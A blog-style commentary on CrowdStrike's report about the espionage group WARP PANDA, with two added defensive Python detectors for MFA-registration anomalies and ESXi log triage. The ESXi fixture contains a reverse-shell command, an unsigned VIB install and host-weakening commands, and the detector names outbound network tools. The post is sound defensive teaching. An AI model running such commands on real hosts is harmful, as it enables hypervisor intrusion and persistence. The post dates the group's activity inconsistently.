According to TechRepublic, cybersecurity firm CrowdStrike has identified a new and highly sophisticated China-linked espionage group it’s calling WARP PANDA. This group has been actively targeting US organizations in the legal, technology, and manufacturing sectors since at least late 2023, with operations expanding throughout 2025. Their primary focus is on compromising VMware vCenter servers and Microsoft Azure cloud environments. Using a custom toolkit that includes the BRICKSTORM malware and new implants named Junction and GuestConduit, they embed themselves deeply within virtualization infrastructure to maintain covert access for years. The group’s activities are assessed to be aligned with the long-term intelligence priorities of the People’s Republic of China, focusing on stealing strategic data rather than financial gain.
The new breed of espionage
Here’s the thing: WARP PANDA represents a worrying evolution in how nation-states spy on governments and corporations. They’re not just breaking in and grabbing files anymore. They’re moving into the foundation of your IT infrastructure: the hypervisor layer that runs all of your virtual machines. Think of it like this: instead of sneaking into one apartment in a building, they’ve taken over the building’s security office and plumbing. From there they can see every tenant, move anywhere, and they are very hard to spot, because most endpoint agents run inside the guest VMs and never see the host, and activity on vCenter and ESXi looks like ordinary administrative work. This is a nightmare scenario for defenders, especially in industries like manufacturing, where operational technology (OT) networks are increasingly connected to IT systems and the same virtualization platform often hosts both. For those organizations, securing the underlying virtualization platform is no longer optional; it’s critical.
Why cloud identity is the new battleground
But it doesn’t stop at VMware. WARP PANDA’s forays into Microsoft Azure show they understand the modern enterprise playbook perfectly. Their tactic of registering their own multi-factor authentication (MFA) device after gaining access to an account is a textbook persistence move: once their device is enrolled, a later password reset doesn’t lock them out. It’s also a huge red flag for every company using cloud services. If you aren’t watching your authentication and audit logs for new MFA method registrations, and reviewing changes to conditional access policies, this will slip past you. They also replayed stolen session tokens and tunneled traffic to reach Microsoft 365. Because a replayed token represents a session that has already authenticated, the password and MFA prompts never fire again, so a lot of traditional controls simply don’t see it. So what’s the real impact? It means your cloud tenant, the place you assume is secure because a giant like Microsoft runs it, is now a primary target. The data they went after, network engineering documents and incident response plans, is especially worrying. That’s not just espionage; that’s reconnaissance to make future intrusions harder to detect and evict.
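One way to turn the "watch for new MFA registrations" advice into a concrete check, as an added example that is not part of the original article or CrowdStrike’s analysis: correlate security-info registration events with the same user’s recent sign-in history and flag registrations from an address the account has never used, or that follow closely after a sign-in from a new address. The record layout is modelled on the Microsoft Graph directoryAudits and signIns schemas, but every record below is constructed for illustration, and the 30-day baseline and 6-hour "recent" window are assumptions to tune.

```python
"""Flag suspicious MFA-method registrations by comparing them with the
user's sign-in history. Added example; records are constructed, not real
tenant data. Field names follow the Graph directoryAudits / signIns shape."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Constructed sign-in records (subset of Graph signIn fields).
SIGN_INS = [
    {"createdDateTime": "2025-03-01T08:02:11Z", "userPrincipalName": "j.doe@example.com", "ipAddress": "198.51.100.20"},
    {"createdDateTime": "2025-03-02T08:05:43Z", "userPrincipalName": "j.doe@example.com", "ipAddress": "198.51.100.20"},
    {"createdDateTime": "2025-03-03T09:11:02Z", "userPrincipalName": "j.doe@example.com", "ipAddress": "198.51.100.21"},
    # Sign-in from an address this account has never used before.
    {"createdDateTime": "2025-03-04T02:17:30Z", "userPrincipalName": "j.doe@example.com", "ipAddress": "203.0.113.77"},
    {"createdDateTime": "2025-03-01T07:30:00Z", "userPrincipalName": "a.smith@example.com", "ipAddress": "198.51.100.30"},
    {"createdDateTime": "2025-03-02T07:31:00Z", "userPrincipalName": "a.smith@example.com", "ipAddress": "198.51.100.30"},
    {"createdDateTime": "2025-03-04T07:30:00Z", "userPrincipalName": "a.smith@example.com", "ipAddress": "198.51.100.30"},
]

# Constructed directory-audit records. "User registered security info" is the
# activity name Entra ID uses for MFA method enrolment.
AUDITS = [
    {"activityDateTime": "2025-03-04T02:21:05Z", "activityDisplayName": "User registered security info",
     "initiatedBy": {"user": {"userPrincipalName": "j.doe@example.com", "ipAddress": "203.0.113.77"}}},
    {"activityDateTime": "2025-03-04T07:35:00Z", "activityDisplayName": "User registered security info",
     "initiatedBy": {"user": {"userPrincipalName": "a.smith@example.com", "ipAddress": "198.51.100.30"}}},
    {"activityDateTime": "2025-03-04T07:36:00Z", "activityDisplayName": "Update user",
     "initiatedBy": {"user": {"userPrincipalName": "admin@example.com", "ipAddress": "198.51.100.5"}}},
]


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


@dataclass
class Finding:
    user: str
    ip: str
    registered_at: datetime
    reasons: list[str]


def flag_mfa_registrations(audits, sign_ins, baseline=timedelta(days=30),
                           recent=timedelta(hours=6)) -> list[Finding]:
    """Return registrations whose source IP is outside the user's baseline, or
    which follow a sign-in from a non-baseline IP inside the `recent` window.
    The baseline deliberately excludes the `recent` window so an attacker's
    own sign-in cannot whitelist the address they register from."""
    findings: list[Finding] = []
    for audit in audits:
        if audit["activityDisplayName"] != "User registered security info":
            continue
        actor = audit["initiatedBy"]["user"]
        user, ip = actor["userPrincipalName"], actor["ipAddress"]
        at = parse_ts(audit["activityDateTime"])
        user_sign_ins = [(parse_ts(s["createdDateTime"]), s["ipAddress"])
                         for s in sign_ins if s["userPrincipalName"] == user]
        history = {sip for ts, sip in user_sign_ins if at - baseline <= ts < at - recent}
        fresh = sorted({sip for ts, sip in user_sign_ins
                        if at - recent <= ts <= at and sip not in history})
        reasons = []
        if ip not in history:
            reasons.append(f"registering IP {ip} not in {baseline.days}-day sign-in history")
        if fresh:
            reasons.append(f"preceded within {recent} by sign-in from new IP(s) {fresh}")
        if reasons:
            findings.append(Finding(user, ip, at, reasons))
    return findings


if __name__ == "__main__":
    for f in flag_mfa_registrations(AUDITS, SIGN_INS):
        print(f.registered_at.isoformat(), f.user, f.ip, "; ".join(f.reasons))
```

In the constructed data only j.doe’s registration is flagged (new address, and a sign-in from that address four minutes earlier), while a.smith re-registering from a long-used address is left alone. In production the same logic runs over exported Graph data or a SIEM query; the interesting design choice is the gap between the baseline and the recent window, which stops the attacker’s initial sign-in from legitimising the address they enrol from.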
What can companies do?
CrowdStrike’s advice is technical but urgent: monitor ESXi and vCenter logs like a hawk, restrict outbound internet access from your hypervisors, rotate credentials aggressively, and put endpoint detection on your guest VMs. That last one is key for spotting their tunneling behavior, since the guest is the only place an agent can see the traffic. The broader takeaway, though, is a mindset shift. Defenders have to assume that the management layers of their hybrid cloud, vCenter, Entra ID (formerly Azure AD), and the cloud consoles, are high-value targets that will be attacked. You can’t just focus on protecting the workloads anymore; you have to protect the platform that runs the workloads. It’s a tougher, more complex fight. And let’s be honest, how many organizations are really equipped to monitor their virtualization infrastructure at that level?
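To make the "monitor ESXi logs" and "restrict outbound access from hypervisors" advice tangible, here is an added example that is not from the article or CrowdStrike: a small rule-based triage over ESXi auth and shell log lines that flags interactive root logins from outside an assumed management network and shell commands that weaken host integrity or open outbound connections. The log lines are constructed in a simplified syslog layout (timestamp, host, process[pid], message); real ESXi auth.log and shell.log formatting varies by version, and the management range and command patterns are assumptions to adapt to your environment.

```python
"""Rule-based triage of ESXi auth/shell log lines. Added example; the log
lines below are constructed and simplified, not captured from a real host."""
import ipaddress
import re
from dataclasses import dataclass

# Assumed management / jump-host range. Logins from anywhere else are out of policy.
MGMT_NETS = [ipaddress.ip_network("10.10.5.0/24")]

# Constructed log lines: one in-policy login, one out-of-policy login, a run of
# host-weakening shell commands, an outbound connection attempt, and a benign command.
LOG_LINES = """\
2025-03-04T02:40:12Z esx01 sshd[2101234]: Accepted keyboard-interactive/pam for root from 10.10.5.9 port 51234 ssh2
2025-03-04T02:55:40Z esx01 sshd[2101290]: Accepted publickey for root from 172.16.44.200 port 40022 ssh2
2025-03-04T02:56:02Z esx01 shell[2101300]: [root]: esxcli software acceptance set --level=CommunitySupported
2025-03-04T02:56:30Z esx01 shell[2101300]: [root]: esxcli software vib install -v /tmp/payload.vib --no-sig-check
2025-03-04T02:57:10Z esx01 shell[2101300]: [root]: vi /etc/rc.local.d/local.sh
2025-03-04T02:58:00Z esx01 shell[2101300]: [root]: nc 203.0.113.9 443 -e /bin/sh
2025-03-04T03:10:00Z esx01 shell[2101400]: [root]: esxcli vm process list
""".splitlines()

SSH_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+) port \d+")
SHELL_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) shell\[\d+\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$")

# (rule name, pattern applied to the shell command). Assumed patterns, not an
# exhaustive list of what an intruder might run.
RISKY_COMMANDS = [
    ("acceptance level lowered", re.compile(r"esxcli software acceptance set")),
    ("unsigned or forced VIB install", re.compile(r"esxcli software vib install.*(--no-sig-check|--force)")),
    ("boot persistence script edited", re.compile(r"/etc/rc\.local\.d/local\.sh")),
    ("host firewall disabled", re.compile(r"esxcli network firewall set.*--enabled[ =]false")),
    ("outbound network tool invoked", re.compile(r"^(nc|ncat|curl|wget|ssh|python\S*)\b")),
]


@dataclass
class Alert:
    ts: str
    host: str
    rule: str
    detail: str


def triage(lines, mgmt_nets=MGMT_NETS) -> list:
    """Return one Alert per out-of-policy SSH login or risky shell command."""
    alerts = []
    for line in lines:
        m = SSH_RE.match(line)
        if m:
            ip = ipaddress.ip_address(m["ip"])
            if not any(ip in net for net in mgmt_nets):
                alerts.append(Alert(m["ts"], m["host"], "ssh login outside management network",
                                    f"{m['user']} from {ip}"))
            continue
        m = SHELL_RE.match(line)
        if not m:
            continue
        for rule, pattern in RISKY_COMMANDS:
            if pattern.search(m["cmd"]):
                alerts.append(Alert(m["ts"], m["host"], rule, m["cmd"]))
    return alerts


if __name__ == "__main__":
    for a in triage(LOG_LINES):
        print(a.ts, a.host, a.rule, "|", a.detail)
```

Against the constructed lines this yields five alerts: the login from 172.16.44.200, the acceptance-level change, the unsigned VIB install, the edit to the boot-time script, and the `nc` connection out to the internet. The last one is exactly the behaviour the "restrict outbound internet access from your hypervisors" advice is meant to make both impossible and conspicuous; pairing the egress block with this kind of log rule gives you a detection when someone tries anyway.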
The long game
This isn’t a smash-and-grab operation. WARP PANDA has been around since at least 2022, and CrowdStrike thinks they’re in it for the long haul, backed by significant resources. That’s the hallmark of a state-aligned group: patience and a strategic mandate. They’re playing chess, not checkers. Their focus on geopolitical intelligence, like accessing emails of employees working on Asia Pacific issues, tells you everything about their mission. For business leaders, the message is clear. The threats to your crown jewels are no longer just coming through phishing emails to employees. They’re coming through the fundamental technologies you use to run your business every single day. Ignoring the security of your cloud and virtualization management tools is a risk you simply can’t afford to take. You can read CrowdStrike’s full detailed analysis on their blog.
